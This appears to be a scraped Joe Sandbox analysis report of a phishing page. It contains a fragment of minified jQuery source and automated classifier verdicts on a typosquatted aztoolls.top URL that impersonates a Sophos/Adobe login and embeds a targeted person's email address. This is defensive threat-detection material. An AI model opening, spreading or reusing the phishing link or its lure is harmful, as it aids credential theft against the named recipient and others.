e}var f="3.6.3",E=function(e,t){return new E.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}E.fn=E.prototype={jquery:f,constructor:E,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=E.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return E.each(this,e)},map:function(n){return this.pushStack(E.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(E.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(E.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},E.extend=E.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(E.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||E.isPlainObject(n)?n:{},i=!1,a[t]=E.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},E.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=y.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?E.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:v}),"function"==typeof Symbol&&(E.fn[Symbol.iterator]=t[Symbol.iterator]),E.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,S,y,s,c,v,E="s |
| URL: https://emailway.aztoolls.top/_sophosmith_oxy/?login=yuluyev_an@rfs.ru&page=_adobe&request_type=null&page_bg=null&no_redrct=null&pcnt=null&no_psplash=null&pmax=null&vcnt=null&use_cdtimr=null Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://emailway.aztoolls.top/_sophosmith_oxy/?login=yuluyev_an@rfs.ru&page=_adobe&request_type=null&page_bg=null&no_redrct=null&pcnt=null&no_psplash=null&pmax=null&vcnt=null&use_cdtimr=null Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Your license is expired. Please contact admin on skype: live:.cid.e08fe8b01d7680da",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://emailway.aztoolls.top/_sophosmith_oxy/?login=yuluyev_an@rfs.ru&page=_adobe&request_type=null&page_bg=null&no_redrct=null&pcnt=null&no_psplash=null&pmax=null&vcnt=null&use_cdtimr=null Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://emailway.aztoolls.top/_sophosmith_oxy/?login=yuluyev_an@rfs.ru&page=_adobe&request_type=null&page_bg=null&no_redrct=null&pcnt=null&no_psplash=null&pmax=null&vcnt=null&use_cdtimr=null Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://aztoolls.top Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://aztoolls.top |
Edit tour
chrome.exe (PID: 736 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node